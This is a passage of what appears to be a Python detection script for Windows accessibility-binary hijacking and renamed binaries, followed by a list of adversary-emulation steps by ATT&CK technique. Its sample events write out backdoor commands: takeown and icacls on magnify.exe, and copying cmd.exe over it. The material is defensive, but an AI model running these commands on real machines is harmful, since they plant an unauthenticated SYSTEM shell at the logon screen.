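    original_file_name: str  # OriginalFileName from the PE version resource ("" if none)

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _targeted_accessibility_binary(cmdline: str) -> Optional[str]:
    """Name of the accessibility binary referenced on the command line, if any."""
    for name in sorted(ACCESSIBILITY_BINARIES):
        if re.search(r"(?<![\w.])" + re.escape(name) + r"\b", cmdline, re.IGNORECASE):
            return name
    return None

def classify(ev: ProcEvent) -> List[str]:
    """Return the finding labels that apply to one process-creation event."""
    findings = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    ofn = ev.original_file_name.lower()
    target = _targeted_accessibility_binary(ev.cmdline)
    # 17.B.1 / 17.B.2: ownership or DACL change on an accessibility binary
    if image in PERMISSION_TOOLS and target:
        findings.append(f"permission change on {target} via {image}")
    # 17.C.1: a copy/move whose command line names an accessibility binary
    if image in SHELLS | {"xcopy.exe", "robocopy.exe"} and target and COPY_VERBS.search(ev.cmdline):
        findings.append(f"overwrite of {target}")
    # 20.A.1: the accessibility binary that runs is not what its name says
    if image in ACCESSIBILITY_BINARIES and ofn and ofn != image:
        findings.append(f"{image} has OriginalFileName {ev.original_file_name}")
    # 20.A.1 seen from the child side: a shell spawned by an accessibility binary
    if parent in ACCESSIBILITY_BINARIES and image in SHELLS:
        findings.append(f"{image} spawned by {parent}")
    # 19.A.1 / 19.B.1: any other renamed binary (recycler.exe that is really WinRAR)
    if ofn and ofn != image and image not in ACCESSIBILITY_BINARIES:
        findings.append(f"renamed binary: {image} is really {ev.original_file_name}")
    return findings

def scan(events):
    """(host, image basename, findings) for every event with at least one finding."""
    return [(ev.host, _basename(ev.image), f) for ev in events for f in [classify(ev)] if f]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed records modelled on steps 17.B.1, 17.B.2, 17.C.1, 20.A.1 and 19.B.1, plus a genuine magnify.exe.
SAMPLE_EVENTS = [
    ProcEvent("CREEPER", r"C:\Windows\System32\takeown.exe",
              r"takeown /f C:\Windows\System32\magnify.exe", PS, "takeown.exe"),
    ProcEvent("CREEPER", r"C:\Windows\System32\icacls.exe",
              r"icacls C:\Windows\System32\magnify.exe /grant Administrators:F", PS, "iCACLS.EXE"),
    ProcEvent("CREEPER", r"C:\Windows\System32\cmd.exe",
              r"cmd /c copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\magnify.exe", PS, "Cmd.Exe"),
    ProcEvent("CREEPER", r"C:\Windows\System32\magnify.exe",
              r"C:\Windows\System32\magnify.exe", r"C:\Windows\System32\winlogon.exe", "Cmd.Exe"),
    ProcEvent("CODERED", r"C:\Users\bob\AppData\Local\Temp\recycler.exe",
              r"recycler.exe a -hpsecret old.rar Shockwave_network.vsdx", PS, "WinRAR.exe"),
    ProcEvent("CODERED", r"C:\Windows\System32\magnify.exe",
              r"C:\Windows\System32\magnify.exe", r"C:\Windows\explorer.exe", "MAGNIFY.EXE"),
]

if __name__ == "__main__":
    for host, image, findings in scan(SAMPLE_EVENTS):
        print(f"{host} {image}: {'; '.join(findings)}")
```

The OriginalFileName comparison is the check that survives the rename: a hash allow-list would also catch the copied cmd.exe, but the version-resource name is already in the telemetry and needs no baseline. It does not help against a binary whose version resource was edited to match its new name, which is why the chain rules on takeown/icacls and copy remain worth keeping.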
Not in scope: Plist Modification, Modify Registry, Port Knocking, Mshta, Port Monitors, NTFS File Attributes
Not in scope: Rc.common

Network Share Connection Removal (Defense Evasion)
Step    Procedure
16.C.1  Empire: 'net use /delete' via PowerShell
Not in scope: Re-opened Applications, Obfuscated Files or Information, Redundant Access, Plist Modification
Registry Run Keys / Startup Folder (Persistence)
Step    Procedure
1.B.1   Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
10.A.1  Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Not in scope: Port Knocking, SIP and Trust Provider Hijacking, Process Doppelgänging
Scheduled Task (Persistence): same procedures as listed under Execution above (7.C.1, 10.A.2)
Not in scope: Process Hollowing, Screensaver

Process Injection (Defense Evasion): same procedures as listed under Privilege Escalation above (3.C.1, 5.A.1, 5.A.2, 8.D.1)
Not in scope: Security Support Provider, Redundant Access, Service Registry Permissions Weakness, Regsvcs/Regasm, Setuid and Setgid, Regsvr32, Shortcut Modification, Rootkit
Not in scope: Startup Items

Rundll32 (Defense Evasion): same procedure as listed under Execution above (1.A.1)
Not in scope: System Firmware, SIP and Trust Provider Hijacking, Time Providers

Scripting (Defense Evasion): same procedures as listed under Execution above (1.A.1, 11.A.1, 12.E.1)
Not in scope: Trap, Signed Binary Proxy Execution

Valid Accounts (Persistence): same procedures as listed under Privilege Escalation above (10.B.1, 16.B.1, 16.D.1)
Not in scope: Signed Script Proxy Execution, Web Shell, Software Packing, Windows Management Instrumentation Event Subscription, Space after Filename, Winlogon Helper DLL, Template Injection, Timestomp, Trusted Developer Utilities
Valid Accounts (Defense Evasion): same procedures as listed under Privilege Escalation above (10.B.1, 16.B.1, 16.D.1)
Not in scope: Web Service, XSL Script Processing